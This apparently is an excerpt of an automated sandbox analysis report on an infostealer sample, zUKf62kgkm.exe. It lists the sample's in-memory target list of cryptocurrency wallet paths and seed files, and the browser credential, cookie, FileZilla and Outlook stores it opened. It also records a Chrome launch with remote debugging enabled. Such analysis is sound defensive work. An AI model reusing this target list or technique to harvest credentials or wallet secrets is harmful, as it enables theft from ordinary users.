Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: zUKf62kgkm.exe, 00000000.00000002.2091797382.000000000107C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.wallet
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000934000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*.*
Source: zUKf62kgkm.exe, 00000000.00000002.2091194636.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: 00000000.00000002.2091194636.0000000000918000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: zUKf62kgkm.exe PID: 7116, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match File source: 00000000.00000002.2091797382.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1809616289.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2091194636.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: zUKf62kgkm.exe PID: 7116, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: zUKf62kgkm.exe PID: 7116, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs